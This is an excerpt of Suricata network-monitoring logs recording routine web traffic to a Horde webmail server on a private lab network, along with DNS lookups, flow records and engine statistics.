{"timestamp":"2020-02-29T00:02:15.573185+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":5}} 
{"timestamp":"2020-02-29T00:02:15.574651+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.574878+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:02:15.617354+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} 
{"timestamp":"2020-02-29T00:02:19.398695+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":4}} {"timestamp":"2020-02-29T00:02:19.399076+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} 
{"timestamp":"2020-02-29T00:02:20.000204+0000","event_type":"stats","stats":{"uptime":13792,"capture":{"kernel_packets":132471,"kernel_drops":0},"decoder":{"pkts":132561,"bytes":92010943,"invalid":179,"ipv4":131136,"ipv6":8,"ethernet":132561,"raw":0,"null":0,"sll":0,"tcp":126147,"udp":4796,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2668,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2684,"synack":2675,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1715,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2187,"failed_udp":106},"tx":{"http":4458,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2263}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":142595,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:20.465830+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52658,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imageupload.js","state":"CLOSED","stored":false,"size":2232,"tx_id":0}} {"timestamp":"2020-02-29T00:02:20.573829+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":3}} {"timestamp":"2020-02-29T00:02:20.573923+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":6}} {"timestamp":"2020-02-29T00:02:21.000172+0000","flow_id":985912589424072,"event_type":"flow","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":1975,"bytes_toclient":9919,"start":"2020-02-29T00:00:44.595400+0000","end":"2020-02-29T00:01:20.225407+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001655+0000","flow_id":876743112598001,"event_type":"flow","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":25,"pkts_toclient":27,"bytes_toserver":3953,"bytes_toclient":25164,"start":"2020-02-29T00:01:13.467441+0000","end":"2020-02-29T00:01:22.403062+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:23.001892+0000","flow_id":1463401285748420,"event_type":"flow","src_ip":"192.168.10.81","src_port":52648,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":14,"bytes_toserver":2601,"bytes_toclient":11271,"start":"2020-02-29T00:01:17.198340+0000","end":"2020-02-29T00:01:22.217976+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.001995+0000","flow_id":1610366476737736,"event_type":"flow","src_ip":"192.168.10.81","src_port":52642,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1978,"bytes_toclient":8886,"start":"2020-02-29T00:01:17.187592+0000","end":"2020-02-29T00:01:22.218168+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002101+0000","flow_id":788481534977091,"event_type":"flow","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":33,"pkts_toclient":40,"bytes_toserver":8697,"bytes_toclient":43206,"start":"2020-02-29T00:01:17.189507+0000","end":"2020-02-29T00:01:22.697610+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:23.002194+0000","flow_id":948834138972290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52644,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":13,"bytes_toserver":2050,"bytes_toclient":12236,"start":"2020-02-29T00:01:17.188546+0000","end":"2020-02-29T00:01:22.218016+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.002272+0000","flow_id":116207484000165,"event_type":"flow","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":49,"bytes_toserver":10855,"bytes_toclient":46440,"start":"2020-02-29T00:01:17.186277+0000","end":"2020-02-29T00:01:22.699267+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:23.858656+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20600,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:23.964468+0000","flow_id":936726630439456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43411,"proto":"UDP","dns":{"type":"answer","id":20600,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:24.117424+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131}} {"timestamp":"2020-02-29T00:02:24.404100+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":5}} 
{"timestamp":"2020-02-29T00:02:27.000146+0000","event_type":"stats","stats":{"uptime":13799,"capture":{"kernel_packets":132584,"kernel_drops":0},"decoder":{"pkts":132593,"bytes":92021068,"invalid":179,"ipv4":131166,"ipv6":8,"ethernet":132593,"raw":0,"null":0,"sll":0,"tcp":126175,"udp":4798,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095616},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2669,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2685,"synack":2676,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1716,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2188,"failed_udp":106},"tx":{"http":4460,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2264}},"flow_mgr":{"closed_pruned":2648,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20498,"memcap_state":0,"memcap_global":0},"http":{"memuse":54024,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:28.571788+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} {"timestamp":"2020-02-29T00:02:28.573297+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":0}} {"timestamp":"2020-02-29T00:02:28.578970+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58895,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:28.617395+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.690397+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58895,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:28.707225+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56168,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:28.812490+0000","flow_id":1061177603184026,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56168,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:29.000724+0000","flow_id":136591399180898,"event_type":"flow","src_ip":"192.168.10.81","src_port":52650,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1777,"bytes_toclient":1792,"start":"2020-02-29T00:01:23.121442+0000","end":"2020-02-29T00:01:28.332392+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:02:29.118397+0000","flow_id":1530510154133066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=5vmPLSQuRAd-p6FI4ND2V1R&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6131},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30700,"tx_id":0}} {"timestamp":"2020-02-29T00:02:30.003648+0000","flow_id":1393011066924782,"event_type":"flow","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":15,"bytes_toserver":1828,"bytes_toclient":11853,"start":"2020-02-29T00:01:19.978670+0000","end":"2020-02-29T00:01:29.023351+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:02:33.551797+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":37713,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:33.574791+0000","flow_id":1520949557243714,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52664,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":1}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:33.658408+0000","flow_id":17002334350197,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35837,"proto":"UDP","dns":{"type":"answer","id":37713,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:33.756645+0000","flow_id":432102333557313,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:02:34.000216+0000","event_type":"stats","stats":{"uptime":13806,"capture":{"kernel_packets":132616,"kernel_drops":0},"decoder":{"pkts":132628,"bytes":92028677,"invalid":180,"ipv4":131199,"ipv6":8,"ethernet":132628,"raw":0,"null":0,"sll":0,"tcp":126203,"udp":4802,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2672,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2688,"synack":2679,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1717,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2189,"failed_udp":106},"tx":{"http":4462,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2266}},"flow_mgr":{"closed_pruned":2650,"new_pruned":15,"est_pruned":2235,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21159,"memcap_state":0,"memcap_global":0},"http":{"memuse":37055,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:34.001094+0000","flow_id":849006199346554,"event_type":"flow","src_ip":"192.168.10.122","src_port":43852,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:32.890234+0000","end":"2020-02-28T23:57:33.002100+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:34.001823+0000","flow_id":1794109457924391,"event_type":"flow","src_ip":"192.168.10.122","src_port":51275,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:57:33.622887+0000","end":"2020-02-28T23:57:33.734194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:36.000710+0000","flow_id":679183207983578,"event_type":"flow","src_ip":"192.168.10.130","src_port":34694,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":18,"pkts_toclient":18,"bytes_toserver":1670,"bytes_toclient":20546,"start":"2020-02-29T00:01:29.944602+0000","end":"2020-02-29T00:01:35.171147+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 